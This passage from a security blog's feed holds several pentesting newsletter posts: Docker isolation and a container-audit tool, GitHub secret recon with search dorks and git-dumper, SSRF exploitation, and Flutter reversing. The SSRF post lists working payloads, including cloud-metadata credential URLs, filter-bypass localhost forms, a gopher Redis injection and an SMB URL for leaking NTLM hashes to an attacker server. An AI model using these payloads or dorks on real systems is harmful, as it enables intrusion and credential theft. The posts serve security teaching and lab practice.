    -   Find and crack the JWT secret, forge tokens, and access protected APIs
    -   👉 End-to-end JWT manipulation and scripting practice
-   **🎮 Hack The Box – Blazorized**
    -   Extract hardcoded JWTs from DLLs and inspect traffic for insecure storage
    -   👉 Mix of reverse engineering and token abuse

## 🧭 Final Thoughts

JWTs are everywhere: APIs, mobile apps, single sign-on flows. And when mishandled, they can be your easiest way in.

Start by understanding how they work. Then test. Tamper. Re-sign. Exploit.

Whether you&apos;re a pentester, bug hunter, or dev, knowing how to break JWTs means knowing how to protect them.

Until next time,  
Stay sharp, stay curious,  
Ruben 🚀</content:encoded><category>Newsletter</category><category>web-security</category><author>Ruben Santos</author></item><item><title>Docker Security: Dissecting Namespaces, cgroups, and the Art of Misconfiguration</title><link>https://www.kayssel.com/post/docker-security-1</link><guid isPermaLink="true">https://www.kayssel.com/post/docker-security-1</guid><description>Docker uses namespaces, cgroups &amp; OverlayFS for isolation, but misconfigs (root, --privileged, sensitive mounts) weaken security. Valeris, a Rust CLI, audits running containers, flags risks, and provides a checklist to harden deployments.</description><pubDate>Sun, 25 May 2025 16:16:34 GMT</pubDate><content:encoded># TL;DR

-   Understand how Docker containers isolate processes with **namespaces**, **cgroups**, and **OverlayFS**.
-   See why isolation ≠ security, and where common misconfigurations open real attack paths.
-   Meet **Valeris**, a Rust CLI that audits running containers for dangerous defaults.
-   Walk away with a checklist to keep your next deploy out of the breach headlines.

# Welcome to the Series

If you’ve followed my work, you know I love application security testing. Lately, more clients rely on Docker and Kubernetes, yet I hadn’t explored the internals deeply until now.

To make this journey practical (and fun), I’m building **Valeris**, a Rust‑based CLI that scans running containers for misconfigurations. It’s part learning project, part real‑world utility, and you get to watch (or help!) while I build.

In this first chapter:

-   You’ll learn what Docker is and how it works.
-   I’ll introduce Valeris and show you how it works.
-   And we’ll look at some common misconfigurations it can already detect.

Let’s go.

# What Is Docker?

Docker is a platform that lets you package an app, its dependencies, and its environment into a container: a lightweight “virtual box” that shares the host’s kernel but runs in its own isolated space.

But what does that really mean?

When you run a Docker container, you’re not launching a full operating system like you would with a virtual machine. Instead, you&apos;re starting a regular process on the host... but with some clever isolation tricks applied. These tricks are built into the Linux kernel and revolve around three key mechanisms:

1.  **Namespaces** – what a process can _see_
2.  **Control groups (cgroups)** – what a process can _use_
3.  **Overlay (Union) File Systems** – what a process can _write_

Let’s break them down.

## **Namespaces – The illusion of being alone**

Namespaces are like tinted glasses for processes. They **limit what a process can see or interact with** in the system.

&gt; Think of them as &quot;personal illusions&quot; applied to a process:  
&gt; it _thinks_ it&apos;s alone, but really it’s just been put in a carefully crafted sandbox.

Each namespace type controls a different part of that illusion:

| Namespace | What it isolates | Analogy |
|-----------|------------------|---------|
| `pid` | Process IDs (PIDs) | The process thinks it&apos;s PID 1 (like init) |
| `net` | Network interfaces, IPs, routes | Gets its own &quot;private&quot; network |
| `mnt` | Mount points / filesystems | Sees only its own mounted directories |
| `uts` | Hostname and domain name | Can call itself `vuln-container.local` |
| `ipc` | Shared memory (semaphores, etc.) | Can&apos;t talk to other processes via shared mem |
| `user` | UID/GID mappings | Can map its own root user differently |
| `cgroup` | cgroup membership | Hides host resource limits |

Without namespaces:

-   A process sees all other running processes.
-   It shares the same network as the host.
-   It can access the same filesystem mounts.

With namespaces:

-   A process only sees its own little world.
-   It thinks it&apos;s PID 1 (like a fresh OS).
-   Its network is isolated, its mounts are separated, and its hostname can be totally fake.

#### And how does Docker apply this?

Docker uses Linux syscalls such as `clone(2)` and `unshare(2)` under the hood to create new namespaces when launching a container.

&lt;details&gt;
&lt;summary&gt;So when you type:&lt;/summary&gt;

```bash
docker run debian:stable-slim

```
&lt;/details&gt;


Docker is actually doing something like:

&gt; &quot;Hey kernel, create a new process, but isolate it using these namespaces: PID, NET, MNT, UTS, USER… and maybe don’t tell it it’s just a guest.&quot;

That’s how each container ends up with its own environment, while still running on the same kernel as everything else.
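
You can observe these namespaces from userland. On Linux, `/proc/self/ns` holds one symlink per namespace, and two processes share a namespace exactly when their link targets match. A quick Python sketch (Linux-only; returns an empty dict elsewhere):

```python
import os

def namespace_ids(pid="self"):
    """Map namespace type to its id by reading /proc/PID/ns symlinks (Linux only)."""
    ns_dir = "/proc/{}/ns".format(pid)
    if not os.path.isdir(ns_dir):
        return {}  # not Linux, or /proc not mounted
    return {name: os.readlink(os.path.join(ns_dir, name))
            for name in sorted(os.listdir(ns_dir))}

# Each value looks like 'net:[4026531992]'; run this inside a container
# and the ids differ from the host's, proving the isolation is real.
print(namespace_ids())
```

Comparing the output on the host and inside a container is a nice way to see exactly which namespaces Docker actually unshared.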

## Control Groups (cgroups) – Resource management for grown-ups

While **namespaces** handle what a process can _see_, **control groups (cgroups)** control **what a process can _use_**.

&gt; Think of cgroups as the resource police:  
&gt; “You get two CPU cores, 512MB of RAM, and _that’s it_. No exceptions.”

In simple terms, **cgroups limit, measure, and isolate resource usage** of processes or groups of processes.

Here&apos;s what you can control:

| Resource | Example usage |
|----------|---------------|
| **CPU** | Limit a container to 1 core, or 50% CPU time |
| **Memory** | Cap RAM usage (and trigger OOM when exceeded) |
| **I/O** | Limit disk read/write speeds |
| **PIDs** | Limit how many processes it can spawn |
| **Network** | Limit bandwidth (with more advanced setups) |

Each cgroup is like a sandbox with a budget: it doesn’t care what the app is doing, but it ensures the app can’t exceed what it&apos;s allowed.

## OverlayFS - Layer cake for containers

&gt; While **namespaces** isolate what a process _sees_, and **cgroups** limit what a process _uses_,  
&gt; the **union file system** makes sure containers don’t accidentally trash your disk (or each other’s).

That’s right: Docker containers don’t get a blank hard drive every time they start. Instead, Docker uses **OverlayFS** (a type of Union FS) to simulate a complete filesystem by **stacking multiple layers**.

Building a Docker container is like assembling a cake:

1.  🎂 At the bottom: a **read-only base image** (e.g. `debian:stable`).
2.  🧁 Next layer: your installed packages (`nginx`, `python`, etc.).
3.  🍒 Then: your app files and configurations.
4.  ✍️ At the top: a **writable layer** that&apos;s unique to this running container.

When your container runs:

-   It **reads** files by scanning top-down through the layers.
-   It **writes** by copying files into the top writable layer only.

This technique is called **copy-on-write**, and it means:

-   Base layers remain untouched,
-   Changes are container-specific,
-   And teardown is fast, just discard the top layer.

Thanks to this layering, Docker can:

-   Reuse the same base images efficiently.
-   Build fast, thanks to cached and layered image construction.
-   Stay isolated even if 10 containers use `debian`, they don’t overwrite each other.
-   Destroy and rebuild containers instantly, because only the writable layer is ephemeral.

Without this, each container would be a complete copy: slow, heavy, and repetitive.
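
The read-top-down, copy-on-write behavior can be modeled in a few lines. This is a toy model for intuition, not how OverlayFS is actually implemented:

```python
class LayeredFS:
    """Toy model of OverlayFS: reads search top-down, writes go to the top layer."""

    def __init__(self, *image_layers):
        self.lower = list(image_layers)  # read-only image layers, bottom first
        self.upper = {}                  # this container's writable layer

    def read(self, path):
        for layer in [self.upper] + list(reversed(self.lower)):  # top-down
            if path in layer:
                return layer[path]
        raise FileNotFoundError(path)

    def write(self, path, data):
        self.upper[path] = data          # copy-on-write: lower layers untouched

base = {"/etc/os-release": "debian"}    # 🎂 read-only base image
app = {"/app/main.py": "print('hi')"}   # 🍒 app layer
fs = LayeredFS(base, app)

fs.write("/etc/os-release", "patched")  # shadows the base copy, never edits it
print(fs.read("/etc/os-release"), base["/etc/os-release"])  # patched debian
```

Two containers built from `base` would each get their own `upper` dict, which is why ten `debian` containers never step on each other.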

# Automating the Hunt for Misconfigurations

Now that we’ve covered the basics of how Docker works, let’s talk about the _real_ reason we&apos;re here: misconfigurations.

As you might imagine, there are **plenty of ways to configure a container poorly**, making it vulnerable to privilege escalation, data leaks, or even host compromise. Some classic examples include:

-   Running the container as **root** (no user restrictions at all),
-   Using the `--privileged` flag (which disables most security protections),
-   Mounting sensitive directories like `/proc` or `/var/run/docker.sock`,
-   Leaking secrets through environment variables like `API_KEY`, `DB_PASSWORD`, or AWS credentials.
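
That last check, for instance, mostly boils down to pattern-matching variable names. Valeris itself is written in Rust; here’s a hypothetical Python sketch of the same idea (the pattern list is illustrative, not Valeris’s actual rules):

```python
import re

# Names that commonly mark secrets in container environments (illustrative list)
SECRET_NAME = re.compile(r"(API[_-]?KEY|SECRET|PASSWORD|PASSWD|TOKEN|CREDENTIAL)",
                         re.IGNORECASE)

def flag_suspicious_env(env_entries):
    """Return the KEY=value entries whose variable name looks like a secret."""
    return [entry for entry in env_entries
            if SECRET_NAME.search(entry.split("=", 1)[0])]

container_env = ["PATH=/usr/local/bin", "DB_PASSWORD=hunter2",
                 "AWS_SECRET_ACCESS_KEY=abcd1234", "LANG=C.UTF-8"]
print(flag_suspicious_env(container_env))
# ['DB_PASSWORD=hunter2', 'AWS_SECRET_ACCESS_KEY=abcd1234']
```

Matching only the name (not the value) keeps false positives manageable while still catching the obvious leaks.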

So yeah, Docker’s isolation isn’t magic. And misconfigurations are surprisingly common, especially in fast-paced environments where security isn&apos;t always a priority.

That’s why I wanted to create a tool that could automate the process of identifying these weak configurations. Not just to save time, but to help me learn the ins and outs of container security along the way.

Yes, I know there are excellent tools out there already, like **Trivy**, **Dockle**, and **docker-bench-security**, and they’re incredibly powerful. But I strongly believe that building something from scratch gives you a deeper understanding of how things really work. And honestly? It’s more fun that way.

## What is Valeris?

**Valeris** is a CLI tool I’m building in Rust to audit Docker (and soon Kubernetes) containers. It scans running containers for misconfigurations that could lead to real security issues. Things like root containers, excessive privileges, dangerous mounts, and exposed secrets.

The best part? I’m building it from scratch as I learn, and documenting the process in this blog series. It’s both a learning journey and (hopefully) a tool that can be genuinely useful.

Valeris is designed with a plugin-based architecture, which means:

-   It’s easy to extend as I learn more.
-   Each plugin can focus on a specific risk (e.g., user privileges, mounts, networking).
-   It makes it easier to explain concepts clearly in the blog, one layer at a time.

### What Valeris Can Already Do

Right now, Valeris can help with a few key checks:

-   Detect if a container is running as the root user.
-   Check if it’s mounting sensitive folders like `/proc` or `/sys`.
-   Report network exposure, such as open ports or host networking.
-   Find environment variables that contain common secret patterns.

It’s still early-stage, but even these basic checks already help streamline container audits.
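Valeris itself is written in Rust, but the logic behind the first few checks is simple enough to sketch in Python against the JSON that `docker inspect` emits. The field names (`Config.User`, `Mounts[].Source`, `HostConfig.Privileged`) are real `docker inspect` keys; the triage rules are a simplified assumption, not Valeris&apos;s actual code:

```python
# Sensitive host paths that should rarely be mounted into a container
SENSITIVE_PREFIXES = ("/proc", "/sys", "/var/run/docker.sock")

def audit_container(inspect_data):
    findings = []
    user = inspect_data.get("Config", {}).get("User", "")
    if user in ("", "0", "root"):  # empty User falls back to the image default, usually root
        findings.append("container runs as root")
    for mount in inspect_data.get("Mounts", []):
        if str(mount.get("Source", "")).startswith(SENSITIVE_PREFIXES):
            findings.append(f"sensitive mount: {mount['Source']}")
    if inspect_data.get("HostConfig", {}).get("Privileged"):
        findings.append("--privileged is enabled")
    return findings

sample = {
    "Config": {"User": ""},
    "Mounts": [{"Source": "/var/run/docker.sock"}],
    "HostConfig": {"Privileged": True},
}
print(audit_container(sample))
```

Feed it `json.load` of `docker inspect CONTAINER` output and you have a ten-line auditor; everything else is pattern lists and reporting.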

## Why build this in Rust?

Glad you asked. I chose Rust because:

-   I wanted to learn it in a real-world context.
-   It gives me a tool that’s fast, memory-safe, and future-proof.
-   It’s widely used in Web3 and infrastructure tooling, which aligns with my interests.
-   And honestly? Rust makes you write better code even if it makes you suffer a little at first.

Also: building a tool while learning is painful… but extremely rewarding.

# Wrapping Up

So, Docker is powerful but also dangerously easy to misconfigure. In this first chapter, we’ve seen what containers _really_ are, why isolation isn&apos;t bulletproof, and how tools like Valeris can help flag the things that most people forget (or ignore) when deploying.

But this is just the beginning.

### What’s Next?

In the next chapter:

-   We&apos;ll create a _vulnerable on purpose_ container setup.
-   We’ll scan it with Valeris and walk through the results.
-   And we’ll dig into how the plugin system works under the hood: how each security check is actually performed.

# Useful links

-   🔗 [GitHub Repo](https://github.com/rsgbengi/valeris)
-   📝 [Blog + upcoming chapters](https://www.kayssel.com/series/docker-security/)
-   ⭐ Give it a star if you like the project

# Resources

Docker. “Docker Engine Security Documentation.” Available at: [https://docs.docker.com/engine/security/](https://docs.docker.com/engine/security/)

man7.org. “namespaces(7) – Linux Manual Page.” Available at: [https://man7.org/linux/man-pages/man7/namespaces.7.html](https://man7.org/linux/man-pages/man7/namespaces.7.html)

The Linux Kernel Documentation. “Control Group v2.” Available at: [https://docs.kernel.org/admin-guide/cgroup-v2.html](https://docs.kernel.org/admin-guide/cgroup-v2.html)

The Linux Kernel Documentation. “Overlay Filesystem.” Available at: [https://docs.kernel.org/filesystems/overlayfs.html](https://docs.kernel.org/filesystems/overlayfs.html)

Aqua Security. “Trivy” Available at: [https://trivy.dev/latest/](https://trivy.dev/latest/)

Good with Tech. “Dockle: Container Image Linter for Security.” Available at: [https://github.com/goodwithtech/dockle](https://github.com/goodwithtech/dockle)

Docker. “Docker Bench for Security.” Available at: [https://github.com/docker/docker-bench-security](https://github.com/docker/docker-bench-security)</content:encoded><author>Ruben Santos</author></item><item><title>🐙 Hacking GitHub – A Beginner’s Guide to Finding the (Not So) Hidden Stuff</title><link>https://www.kayssel.com/newsletter/issue-5</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-5</guid><description>Learn how exposed .git folders, sloppy commits, and forgotten tokens can turn a dev&apos;s mistake into your recon goldmine.</description><pubDate>Sun, 18 May 2025 07:44:20 GMT</pubDate><content:encoded>Hey everyone!  
Hope you&apos;re all doing well and still not accidentally committing your .env files 😅

Before we dive in, just a quick note: I&apos;m currently working on the next post for the blog! It&apos;s going to be all about hacking in Docker while building a security tool in Rust. A mix of learning, building, and breaking things, so stay tuned. I hope you&apos;ll enjoy it! 🚀

This week, we&apos;re diving into GitHub, but not just as a place where devs hang out and push code. We’re treating it like a public treasure map for recon, and you&apos;re about to learn how to read it.  
If you&apos;re new to security or bug hunting, this is a great place to start. Let&apos;s go 👇

# 🧩 So… What Is Git? And Why Do Hackers Care?

At its core, Git is a version control system. It tracks changes in files over time so developers can:

-   Work together without stepping on each other’s toes,
-   Roll back when things break (which they do),
-   And keep a complete history of everything.

Git stores data in a structure of commits, where each one is like a snapshot of the project at that moment. These snapshots live in a hidden `.git` directory and include all file contents, history, metadata, and links to parent commits.
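Those objects are content-addressed: a file becomes a blob named by the SHA-1 of a short header plus its contents. Reproducing a blob ID takes a few lines, which helps later when you start poking around `.git/objects` by hand:

```python
import hashlib

def git_blob_hash(content: bytes) -> str:
    # Git hashes "blob SIZE\0" followed by the raw file contents
    header = f"blob {len(content)}\0".encode()
    return hashlib.sha1(header + content).hexdigest()

# Same ID that `git hash-object` prints for a file containing "hello world\n"
print(git_blob_hash(b"hello world\n"))  # 3b18e512dba79e4c8300dd08aeb37f8e728b8dad
```

Knowing this scheme is what makes the `.git` dumping and blob-carving tricks later in this post work.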

Now, GitHub is just a platform built on top of Git. It hosts your Git repositories online and adds features like:

-   Web-based collaboration,
-   Pull requests and issues,
-   Actions for automation (CI/CD),
-   And, occasionally… juicy developer mistakes.

Why does this matter for us?  
Because all of that metadata, history, and collaboration?  
It can leak things. Big things.

# 🔍 GitHub Dorking (The Google Hacking of GitHub)

GitHub’s search engine is surprisingly powerful. You can use advanced queries (a.k.a. dorks) to find files that **probably shouldn&apos;t be public**.

&lt;details&gt;
&lt;summary&gt;Some juicy examples:&lt;/summary&gt;

```bash
filename:.env
filename:id_rsa
filename:credentials AWS
extension:pem private

```
&lt;/details&gt;


🔧 Tools to help automate this:

-   [`github-dorks`](https://github.com/techgaun/github-dorks)
-   [`github-search`](https://github.com/gwen001/github-search)

Try them. It’s wild what you’ll find just sitting out there.

# 💾 Fuzzing for `.git/` – Downloading Repos in Production

One of the **most overlooked but real-world exploitable issues** is when developers leave the `.git/` folder exposed in production servers.

&lt;details&gt;
&lt;summary&gt;If you fuzz URLs and find something like:&lt;/summary&gt;

```bash
https://example.com/.git/
```
&lt;/details&gt;


...congrats. You can often **dump the entire source code** using [`git-dumper`](https://github.com/arthaud/git-dumper):

```bash
git-dumper https://example.com/.git/ ./dumped-repo

```

This fetches:

-   The full history,
-   Commit logs,
-   Deleted secrets (yep),
-   And sometimes hardcoded credentials to staging or prod.

Pair this with tools like `ffuf` or `dirsearch` to **fuzz for the `.git/` path**, and you&apos;ve got a reliable technique to add to your recon routine.

# 🧠 Dig Through the Commit History

Even if a developer deletes a secret, Git keeps it in the commit history.

&lt;details&gt;
&lt;summary&gt;Try this:&lt;/summary&gt;

```bash
git log -p | grep -i &quot;password\|secret\|token&quot;

```
&lt;/details&gt;


Or use scanners that do it for you:

-   [`TruffleHog`](https://github.com/trufflesecurity/trufflehog)
-   [`Gitleaks`](https://github.com/gitleaks/gitleaks)

These tools can even scan Git **blobs, packfiles, and old deleted commits**.

# 💣 Recover Deleted Files

Git is like a clingy ex—it doesn’t let go of anything.

&lt;details&gt;
&lt;summary&gt;You can find deleted files using:&lt;/summary&gt;

```bash
git log --diff-filter=D --summary

```
&lt;/details&gt;


&lt;details&gt;
&lt;summary&gt;And for hidden or unreachable stuff:&lt;/summary&gt;

```bash
git fsck --unreachable --dangling

```
&lt;/details&gt;


&lt;details&gt;
&lt;summary&gt;Then extract with:&lt;/summary&gt;

```bash
git cat-file -p &lt;blob-hash&gt;

```
&lt;/details&gt;


I&apos;ve found `.env` files, API keys, and even production DB creds sitting quietly in those forgotten corners.

# ⚙️ GitHub Actions – Your CI/CD Playground

Many repos use GitHub Actions to automate builds and deployments. But misconfigured workflows = goldmine for attackers.

&lt;details&gt;
&lt;summary&gt;Look inside:&lt;/summary&gt;

```bash
.github/workflows/*.yml

```
&lt;/details&gt;


Red flags to look for:

-   `pull_request_target` events (can be abused from forks),
-   Secrets used without proper validation,
-   Dynamic `run:` commands pulling in untrusted input.

It&apos;s a CI/CD Wild West out there.
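A first pass over a repo&apos;s workflows can be automated with nothing more than substring checks. This is a deliberately naive sketch (real triage needs a YAML parser and context), but it shows the idea:

```python
# Naive markers for the red flags above; hits are candidates, not confirmed bugs
RED_FLAGS = {
    "pull_request_target": "runs with secrets against fork-controlled code",
    "${{ github.event.": "untrusted event data interpolated into the workflow",
}

def scan_workflow(text):
    """Return a reason for every red-flag marker found in a workflow file."""
    return [reason for marker, reason in RED_FLAGS.items() if marker in text]

workflow = """
on: pull_request_target
jobs:
  build:
    steps:
      - run: echo "${{ github.event.pull_request.title }}"
"""
print(scan_workflow(workflow))
```

Loop that over every file matching `.github/workflows/*.yml` in a dumped repo and you have a quick shortlist to review manually.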

# 🧪 Submodules &amp; Internal Clues

Some projects use Git submodules, which can reveal internal tools or private repos.

&lt;details&gt;
&lt;summary&gt;Check this:&lt;/summary&gt;

```bash
cat .gitmodules

```
&lt;/details&gt;


Other files that leak info:

-   `.npmrc`, `.pypirc`, `.dockerignore`
-   `.vscode/settings.json`
-   `.github/ISSUE_TEMPLATE/config.yml`

You’ll often find references to internal servers, S3 buckets, test credentials, and even real domains.

# 📦 Analyzing `.pack` Files and Blobs

Feeling adventurous?

Git compresses unused data into `.pack` files. You can extract them using:

```bash
git unpack-objects &lt; .git/objects/pack/pack-xyz.pack

```

&lt;details&gt;
&lt;summary&gt;And then:&lt;/summary&gt;

```bash
git cat-file -p &lt;hash&gt;

```
&lt;/details&gt;


Sometimes scanners miss stuff in compressed blobs. Doing this manually = more finds and more fun.

# 🧪 Where to Practice GitHub Hacking

Want to get your hands dirty? Here are a few solid places to start:

**Labs &amp; CTFs:**

-   🧪 **TryHackMe – Git Happens**  
    Great intro to `.git` folder exposures, how to use `git-dumper`, and what sensitive info might be lurking in commit histories.
-   🎮 [**Git-Game**](https://github.com/git-game/git-game)  
    A terminal-based challenge where you solve puzzles using Git commands. It’s super fun and teaches you to explore branches, tags, logs, and hidden secrets.
-   🧠 **Hack The Box – Devzat**  
    Find an exposed `.git` folder (no 404s to help you), use `git-dumper`, and dig through commit history to uncover credentials.
-   🔍 **Hack The Box – Editorial**  
    Commit spelunking at its finest. Find a leaked password, then exploit a vulnerable `python-git` dependency for remote code execution.
-   🛠 **Hack The Box – Craft**  
    Combines Git repo analysis with leaked JWTs and Git issues. Use tools like TruffleHog or go full manual. Realistic and very satisfying.
-   💾 **Hack The Box – Pilgrimage**  
    Classic `.git` leak. Dump the repo, analyze the code, and use what you find to break in deeper.
-   ⚙️ **Hack The Box – Bitlab**  
    GitLab-based box with JavaScript-leaked creds, Git hooks for privesc, and a full repo-to-root flow.
-   🐙 **Hack The Box – OpenSource**  
    Gitea box where you’ll explore commit history for keys, exploit GitSync automation, and craft a sneaky pre-commit privesc.

**Tools:**

-   `git-dumper`
-   `truffleHog`
-   `gitleaks`
-   `github-search`
-   `ffuf` + `.git` wordlists

**Dork collections:**

-   [techgaun/github-dorks](https://github.com/techgaun/github-dorks)

### 🧭 Final Thoughts

GitHub isn&apos;t just a platform for devs. It&apos;s a hacker’s playground full of leftover tokens, config files, and developer breadcrumbs.

If you’re just getting started:

-   Learn Git internals. Understanding `.git` gives you power.
-   Practice with fuzzing + `git-dumper`.
-   Explore commits and deleted files regularly.

Git doesn’t forget. Use that to your advantage.

Catch you next week,

Ruben</content:encoded><category>Newsletter</category><category>web-security</category><author>Ruben Santos</author></item><item><title>Inside the Request: From Basic SSRF to Internal Takeover</title><link>https://www.kayssel.com/newsletter/issue-4</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-4</guid><description>A practical guide to finding and exploiting SSRF vulnerabilities in modern applications.</description><pubDate>Sun, 11 May 2025 08:03:38 GMT</pubDate><content:encoded>Hey everyone!  
Hope you&apos;re doing well!

Last week, I shared some techniques for hacking Flutter apps, diving into client-side vulnerabilities and reverse engineering tips.

This week, we’re jumping into SSRF (Server-Side Request Forgery), one of those vulnerabilities that looks basic but can lead to internal access, cloud credential theft, and even remote code execution in certain setups.

Let’s break it down 👇

## 💥 What is SSRF?

**Server-Side Request Forgery (SSRF)** happens when an application lets you make the server send HTTP requests _on your behalf_. You control the destination of the request, which allows you to:

-   Access internal-only services (`127.0.0.1`, private IPs)
-   Read cloud metadata (AWS, GCP, etc.)
-   Reach internal dashboards, databases, or APIs
-   Trigger internal network scans or data exfiltration
-   Detect external callbacks (Blind SSRF)

Below we’ll look at some of the most common exploitation techniques.

## 🔍 How to Spot Potential SSRF

Before sending payloads, here’s how to recognize a potential SSRF point:

✅ Is there a **URL parameter**?  
✅ Does the app **fetch content based on user input**?  
✅ Does it provide features like:

-   PDF or screenshot generation from external URLs
-   Link previews
-   HTML to PDF/invoice rendering
-   Importing resources from external domains
-   Microservices communication via URLs

If yes, there&apos;s a good chance SSRF might be in play.

&lt;details&gt;
&lt;summary&gt;Try basic probes like:&lt;/summary&gt;

```bash
http://127.0.0.1
http://169.254.169.254/
http://your-id.interact.sh
```
&lt;/details&gt;


## ⚔️ Common SSRF Techniques

### Basic SSRF

&lt;details&gt;
&lt;summary&gt;You control a URL parameter that the server fetches:&lt;/summary&gt;

```bash
url=http://127.0.0.1:8080/admin
```
&lt;/details&gt;


This may expose internal interfaces not meant for external users.

### Cloud Metadata Access ☁️

&lt;details&gt;
&lt;summary&gt;Cloud environments like AWS and GCP expose sensitive metadata at:&lt;/summary&gt;

```bash
http://169.254.169.254/latest/meta-data/
```
&lt;/details&gt;


If reachable, you can steal IAM credentials.

### Open Redirect Bypass 🔁

If a whitelist blocks direct access but follows redirects, try:

```bash
https://trusted.com/redirect?to=http://127.0.0.1:8000
```

The app accepts the trusted domain and unknowingly redirects internally.

### Blind SSRF 👻

You may not see any response, but the request still goes through.  
Use tools like:

-   [interact.sh](https://github.com/projectdiscovery/interactsh)
-   Burp Collaborator

These help detect outbound DNS/HTTP requests triggered by SSRF.

### SSRF in PDF Converters

A classic SSRF target. PDF generators often fetch external resources like images or fonts. You can inject:

```bash
&lt;img src=&quot;http://169.254.169.254/latest/meta-data/&quot; /&gt;
```

If the service embeds the content in the resulting PDF, you’ve got sensitive data in hand.

Also applies to:

-   Invoice generation tools
-   Email previews
-   Screenshot renderers

## 🚀 Bonus: Advanced SSRF Techniques

If you&apos;re already familiar with the basics of SSRF, here are 3 powerful techniques that show up in real-world bug bounty reports and internal pentests. These help bypass common defenses and escalate access beyond basic HTTP abuse.

### **URL Obfuscation (Bypass Filters with Tricks)**

Many applications block obvious inputs like `127.0.0.1` or `localhost`, but forget to account for alternative encodings or formats.

🧪 Try these:

```bash
http://127.1                      # shortened form of 127.0.0.1
http://2130706433                 # decimal for 127.0.0.1
http://[::ffff:127.0.0.1]         # IPv4-mapped IPv6
http://127.0.0.1@yourdomain.com   # spoofed hostname via userinfo
```

These tricks are surprisingly effective for **bypassing simple regex-based filters** or insecure allowlists.
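The decimal form is nothing exotic: it&apos;s just the four octets of the address packed into a single 32-bit integer, which you can verify with Python&apos;s standard library:

```python
import ipaddress

# "Decimal IP" is the four octets as one 32-bit integer:
# 127*2**24 + 0*2**16 + 0*2**8 + 1 = 2130706433
loopback = ipaddress.IPv4Address("127.0.0.1")
print(int(loopback))                       # 2130706433
print(ipaddress.IPv4Address(2130706433))   # 127.0.0.1
```

The same conversion works for any internal target, so you can generate the obfuscated form of whatever private address your filter is blocking.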

### **SSRF via Headers (Referer / User-Agent Abuse)**

Not all SSRFs live in URL parameters. Some services (like link previewers or analytics engines) make internal requests based on headers.

📌 Trick:

```bash
Referer: http://your-interact-url.com
User-Agent: http://169.254.169.254/latest/meta-data/
```

If the backend system automatically fetches content from these headers (e.g. for scraping or logging), you can trigger **blind SSRF** even if no URL parameter is exposed.

### **SSRF via Gopher, Redis, or SMB**

Some SSRFs allow non-HTTP schemes like `gopher://`, `smb://`, or `redis://`. If so, things get really interesting.

-   **Gopher** lets you craft raw TCP payloads (great for Redis injection)
-   **Redis** access allows you to write files or escalate via misconfigurations
-   **SMB** can trigger NTLM authentication leaks from the server

📌 Example – Redis Injection via Gopher:

```bash
gopher://127.0.0.1:6379/_%2a1%0d%0aset%20hacked%20true%0d%0a
```
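That percent-encoded blob is just a raw Redis command with CRLF line endings, URL-encoded into the gopher path. Building and decoding these by hand is error-prone, so a small helper is worth keeping around (a sketch using only the standard library):

```python
from urllib.parse import quote, unquote

def gopher_redis(host, command, port=6379):
    # gopher:// delivers everything after "/_" as raw TCP bytes, so we just
    # percent-encode the Redis inline command, CRLF included
    return f"gopher://{host}:{port}/_{quote(command, safe='')}"

print(gopher_redis("127.0.0.1", "set hacked true\r\n"))

# Decoding the payload from the example above recovers the raw command:
print(repr(unquote("%2a1%0d%0aset%20hacked%20true%0d%0a")))
```

Chaining several commands (e.g. `CONFIG SET dir ...` followed by `SAVE`) is just a matter of concatenating CRLF-terminated lines before encoding.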

📌 Example – NTLM Hash Leak via SMB:

```bash
smb://your-smb-server.com/share
```

💡 These are high-impact payloads in internal networks, often leading to:

-   Remote file writes
-   Credential theft
-   Pivoting and lateral movement

## 🧪 Where to Practice SSRF

### Tryhackme SSRF module

To learn the basic theory you can use TryHackme:

-   [SSRF Module](https://tryhackme.com/room/ssrfhr)

### 📘 PortSwigger Web Security Academy

Free, realistic labs from beginner to advanced:

-   [Server-side request forgery](https://portswigger.net/web-security/ssrf)

### 🧠 Hack The Box – SSRF Machines

Here are some great boxes that feature SSRF:

-   [Editorial](https://www.hackthebox.com/machines/editorial) (easy) → Classic SSRF exploitation for port enumeration.
-   [Gofer](https://www.hackthebox.com/machines/gofer) (hard) → Using the gopher scheme to get access

## 🧰 Tools for SSRF Discovery

-   `ffuf`, `paramspider`, `ParamMiner` → Great for finding URL-based parameters
-   `SSRFmap` → Automates SSRF payloads and internal probing
-   `dnslog.cn`, `interact.sh` → For blind SSRF detection
-   Burp Suite + Collaborator Everywhere
-   Nuclei → Fuzz for SSRF with DAST templates:

```bash
cat urls-with-params.txt | nuclei -dast
```

## 🧭 Final Thoughts

SSRF is simple in concept but powerful in impact, especially when it gives you access to internal services or cloud credentials.

It shows up often in the wild, and with tools like `Nuclei`, `Burp`, and `SSRFmap`, you can hunt it efficiently.

Keep your eyes open for URL-based parameters, especially in converters, previews, and importers.

Catch you next week,

Ruben</content:encoded><category>Newsletter</category><category>web-security</category><author>Ruben Santos</author></item><item><title>Breaking Flutter: A Pentester’s Guide to Dart, Snapshots, and TLS Bypasses</title><link>https://www.kayssel.com/newsletter/issue-3</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-3</guid><description>Real-world techniques and tools for reversing Flutter apps, bypassing TLS pinning, and understanding how Dart code gets shipped in production.</description><pubDate>Sun, 04 May 2025 09:11:41 GMT</pubDate><content:encoded>Hey everyone!  
Hope you&apos;re doing great.

Last week, I shared some key Kerberos attack techniques for pentesters.  
This time, we’re switching gears to something more mobile: **Flutter**, and specifically, how to break it.

Lately, I’ve been auditing several Flutter apps and wanted to share some tips I’ve discovered during the process.  
Whether you’re analyzing a Flutter app during a mobile engagement or just curious about how Flutter works under the hood, this post will give you practical techniques to reverse and poke at them like a pro.

Let’s jump in.

## Quick Theory: How Flutter Apps Actually Work

Before diving into recon techniques, it’s important to understand what makes Flutter apps different under the hood and why reversing them isn&apos;t as straightforward as with regular Android apps.

#### Flutter uses Dart and AOT Compilation

Flutter apps are written in Dart. When building for release (production), Dart code is compiled ahead of time (AOT) into native code. On Android, this results in a native shared object called `libapp.so`, which contains the app’s business logic. This means:

-   There’s no `.dex` or `.smali` representation of the Dart code.
-   Tools like `jadx` won’t show the actual business logic.
-   You&apos;ll need to analyze native libraries directly or inspect Dart snapshots in non-release builds.

#### The Flutter Engine is Embedded

Every Flutter app bundles the Flutter engine, which lives in a shared object called `libflutter.so`. This handles rendering, input, animation, and communication between Dart and native code.

-   `libflutter.so` is shared across all Flutter apps.
-   It doesn&apos;t include project-specific logic, but it&apos;s useful when hooking native functionality with Frida.

#### Communication Happens via Platform Channels

